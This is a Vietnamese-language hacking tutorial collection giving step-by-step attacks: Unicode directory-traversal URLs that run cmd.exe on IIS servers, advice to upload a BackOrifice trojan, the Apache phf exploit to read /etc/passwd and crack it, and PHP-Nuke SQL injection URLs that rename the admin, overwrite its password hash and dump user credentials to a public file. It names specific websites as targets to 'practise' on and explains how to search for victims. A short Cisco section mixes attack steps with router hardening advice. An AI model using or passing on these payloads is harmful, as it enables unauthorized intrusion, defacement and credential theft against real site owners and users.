Hack IIS server bằng UNICODE bug

Giới thiệu :

• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách hack IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !

Hack IIS server bằng UNICODE bug :

• Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server cũng như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu website tất cả đã được patch :)
• Bắt đầu tiến hành :

1.       Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn đánh : telnet . Rồi chọn

Host: diachitrangweb.com | Port: 80 | Term type: vt100

Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server không ?

2.       Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M) đownload ở http://k.domaindlx.com/clairsang/www.softseek.com/default.htm ) và file unicode (download ở đây : unicode.pl )

3.       Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl www.diachiwebsite.com:80

Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:

[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
 

4.       Ví dụ nó scan ra được bug 15 thì ở URL của Browser bạn gõ :

http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh DOS cổ lỗ sĩ thông thường

Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như DOS :))

5.       Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục: c:\inetpub\wwwroot

bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ cứng - đownload ở đây - upload.zip)

cỏ của sổ MS-DOS promt bạn gõ :
perl cgidecoderloader target:80 'f:\inetpub\wwwroot'

Sau khi qua' trình hoàn thành, ở browser bạn đánh :

http://k.domaindlx.com/clairsang/www.diachitrangweb.com/upload.asp rồi upload thứ gì ban muốn (Lời khuyên : upload 1 trojan backorffice để mở port để sau này ban có thể Remote Access đươc.

6.       Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) : http://k.domaindlx.com/clairsang/www.iwss.net/default.htm http://k.domaindlx.com/clairsang/www.colorworksinc.com/default.htm http://k.domaindlx.com/clairsang/www.ewatchanddiamond.com/default.htm http://k.domaindlx.com/clairsang/www.sintaks.com/default.htm http://k.domaindlx.com/clairsang/www.electroid.com/default.htm http://k.domaindlx.com/clairsang/www.aspcart.com/default.htm http://k.domaindlx.com/clairsang/www.cfaluminum.com/default.htm http://k.domaindlx.com/clairsang/www.thecapitalgroup.cc/default.htm http://k.domaindlx.com/clairsang/www.kristan-sp.si/default.htm http://k.domaindlx.com/clairsang/www.parrotnetwork.com/default.htm http://k.domaindlx.com/clairsang/www.enjoyusa.com/default.htm http://k.domaindlx.com/clairsang/www.activewebsystems.co.uk/default.htm http://k.domaindlx.com/clairsang/www.safeteefirst.com/default.htm http://k.domaindlx.com/clairsang/www.xtendafork.com/default.htm  http://k.domaindlx.com/clairsang/vault.kupinet.com/default.htm http://k.domaindlx.com/clairsang/home.socal.rr.com/default.htm .............

• Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack , đay là một thủ thuât dơn giản : ban vào trang http://k.domaindlx.com/clairsang/www.av.com/default.htm rồi search với thuât ngữ sau : "powered by IIS"

Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi :))

Cisco Security

Cisco Security :

Phân tích

Scan Cisco

Theo Bugtrap loan báo năm 1999, các hệ thống của Cisco đều gặp phải lỗi Leakage Vul. Nó sẽ phản hồi trở lại yêu cầu TCP SYN trên cổng 1999. Lợi dụng điều này, kẻ tấn công có thể do thám cisco-router của bạn bằng cách quét TCP trên cổng 1999. Hãy xem nmap có làm được gì?

[root@skank/tmp] nmap -nvv -p1999 <target>

Sau khi nhận được gói RST/ASK, kẻ tấn công có thể tiếp tục tìm kiếm những lổ hỏng khác trên hệ thống cisco của bạn!

Để sửa lỗi này, bạn có thể dùng ACL để ngăn chặn các gói TCP đến cổng 1999!

access-list 101 deny tcp any eq 1999 log

Default Password

Tất cả các router của Cisco cũng như của nhiều nhà sản xuất khác đều có các mật khẩu mặc định! Nếu admin không vô hiệu hóa các mật khẩu này, kẻ tấn công có thể dễ dàng login vào router của bạn và trình diễn mọi điều mà hắn muốn!

User Access Verification
Password: cisco (default password)
whatever enable
Password: cisco (another default) *** Cisco dùng các mật khẩu mặc định này cho user và admin. Thật tệ hại!
Whatever# <- yeah! root?!

Việc cần làm bây giờ là hãy enable password!

enable password 468i5e

Cũng chưa đủ đâu! Hãy dùng thuật toán MD5 cho chắn ăn!

enable secret 6 $3$.utt$8h$ll58ad$oq$DaW

Tuy nhiên nó cũng có thể bị crack bởi chương trình có tên là Cisco Password Decryption do hãng Solarwinds viết ra.

TFTP

Một điều nữa là rất nhiều admin quên disable TFTP cho router của họ. Nó sẽ tạo điều kiện dễ dàng cho kẻ tấn công có thể lấy các file cấu hình router của bạn và dĩ nhiên là mật khẩu nữa!

TFTP - Trial File Transfer Protocol, chạy trên cổng 69. TFTP dùng giao thức UDP nên rất không an toàn!

Hãy xem, đầu tiên kẻ tấn công sẽ quét thử xem router của bạn có chạy TFTP không bằng cách dùng nmap với tham số -sU(quét UDP) và -p69(cổng 69)!

nmap -sU -p69 -nvv <target>

Nếu thành công, kẻ tấn công có thể download file cấu hình .cfg về qua TFTP!

[root @ imleet] tftp
connect 127.0.0.1 ( <--- target)
get las-sariel-rtr.cfg ( <---- bất cứ file gì mà hắn muốn)
quit

Để có thể sửa lỗi này, bạn hãy vô hiệu hóa TFTP cho router của bạn với lệnh sau:

no tftp-server flash <device:filename

RIP SPOOFING

RIP - Routing Information Protocol

Kẻ tấn công có thể chuyển sang spoof(làm giả) RIP, theo đó hắn có thể gởi các gói packet đến mạng của bạn mà không cần được chứng thực một khi router của bạn cho phép các gói packet RIPv1. Vì vậy, lời khuyên tốt nhất là hãy disable tất cả RIP(TCP/UDP, chạy trên cổng 512) trên router của bạn.

Qua bài viết này, tôi hi vọng bạn sẽ biết được chút ít về secure cho cisco-routers!      

Hack Apache server

Giới thiệu :

• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên Apache server mà không dùng đến các tool hack, ta chỉ dùng đến Browser thôi !

Hack Apache server :

• Các website trên NET hiện nay thường dùng Apache server vì có độ bảo mật cao. Vì vậy bug duy nhất được tìm thấy từ năm 97 là lỗi "cgi-bin/phf query". Hiện nay thì lỗi này đã được patch rồi nhưng vẫn có server chưa sửa lỗi, đó là cơ hội để thực tập
• Bắt đầu tiến hành :
  1. Xác đinh website có dùng apache hay không : có nhiều cách để xác đinh bằng cách dùng các tool hacker , nhưng ở đây chúng ta chỉ cần dùng browser là đủ, bạn đánh như sau ở browser :

http://k.domaindlx.com/clairsang/www.diachitrangweb.com/cgi-bin/default.htm

Nếu một thông báo lỗi như sau hiện ra, thì đó đúng là apache server :

Apache/xx.xx.xx at diachitrangweb Port 80 (xx.xx.xx là version của apache)

2. Xác đinh xem server có bị lỗi phf không : ở URL bạn đánh như sau http://k.domaindlx.com/clairsang/www.diachitrangweb.com/cgi-bin/default.htmphf nếu bạn không bi quay vể trang chủ thì bạn có 60% cơ hội dể hack website đó
3. Tiếp tục bạn đánh ở URL đoạn mã lênh sau :

http://k.domaindlx.com/clairsang/www.diachitrangweb.com/cgi-bin/default.htmphf?Qalias=x%0a/bin/cat%20/etc/passwd

lúc đó bạn sẽ có đươc nội dung của file chứa password của server *pwd . Dĩ nhiên là nó đã bi encrypt vì vạy phải save nó vào.

4. OK, sau khi đã có file password dưới dạng *.pwd bạn cần công cụ password tool để decrypt nó, hay dùng nhất là Jackpot (Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper), nhưng theo tôi thì dùng Hacker Utilities thì tốt hơn và nhanh hơn (Download chúng ở mục hacktool). Một file *.pwd encrypt có dạng như sau :

root:Npge08pfz4wuk:0:1:Super-User:/:/sbin/bash
daemon:Fs2e08p34Cxw1:1:1::/:
bin:Npge08pfz4wuk:2:2::/usr/bin:

5. Sau khi đã decrypt password bạn sẽ có user và password để vào server bằng Telnet. ở cửa sổ Run của Windows bạn đánh : telnet . Rồi chọn

Host: diachitrangweb.com | Port: telnet | Term type: vt100

Ðánh user và pass bạn có được để login vào server này

6. Thực hiện một số lệnh Unix để exploit server :

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD .....................

Và bạn muốn làm gì thì đó là tuỳ vào ý thích của bạn (Xem thêm sách telnet ..:) )

7. Giới thiệu mọtt só website để bạn thưc tập : http://k.domaindlx.com/clairsang/www.slu.edu/default.htm http://k.domaindlx.com/clairsang/www.spawn.com/default.htm http://k.domaindlx.com/clairsang/www.garply.com/default.htm
8. Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack , đay là một thủ thuât dơn giản : ban vào trang http://k.domaindlx.com/clairsang/www.av.com/default.htm rồi search với thuât ngữ sau : cgi-bin AND perl.exe OR cgi-bin AND phf

Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ :))

Hack Php-Nuke, Khai thác lỗi trong modules Members List

Khai thác lỗi trong module PHP-Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành viên và Admin.

Cách khai thác như sau:

Trong Module Members_List- Hiển thị tất cả thành viên được sắp xếp theo mật khẩu http://<trang web phpNuke>/modules.php?name=Members_List&letter=All&sortby=pass- Hiển thị tất cả thành viên được sắp xếp theo UIDhttp://<trang web phpNuke>/modules.php?name=Members_List&letter=All&sortby=uid Hai câu truy vấn bên trên thì không có gì để để nói. Híc híc. Bây giờ là câu truy vấn thứ ba- Hiển thị tất cả Moderators http://<trang web phpNuke>/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*- Hiển thị tất cả Administrator http://<trang web phpNuke>/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*...</SPAN>

*Khai thác Admin.
Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn. Khà khà
http://<trang web phpNuke>/modules.php?name=Your_Account&op=savetheme&theme=',name='seamoun'%20where%20uname='Admin'/*&uid=[OUR_UID]
Chuyển đổi mật khẩu của Admin (md5). Để có được mật khẩu md5 của mình các bạn có thể tự tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5. Khỏi mất công viết cho mệt. Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là b6d0de971824629e987b84d513dc8af0
http://<trang web phpNuke>/modules.php?name=Your_Account&op=saveuser&email=',pass='b6d0de971824629e987b84d513dc8af0'%20where%20uname='Admin'/*&uid=[OUR_UID]
Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra. Hì hì
Làm như trên thì mỗi lần ta chỉ làm cho một user thui. Vậy thì mệt quá, để lấy tất cả mật khẩu cũng như mail lưu thành tệp email chẳng hạn.
Câu lệnh như sau sẽ lưu thông tin của user
http://<trang web phpNuke>/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/<đường dẫn web>/email.txt'/*
Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host. để view file này thì đường dẫn nó là
http://<trang web phpNuke>/email.txt
- Lưu tất cả thông tin của Admin vào một tệp admin.txt
http://<trang web phpNuke>/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/<đường dẫn web>/admin.txt
Đường dẫn để view trang này thì cũng như trên
Tài liệu tham khảo: phpsecure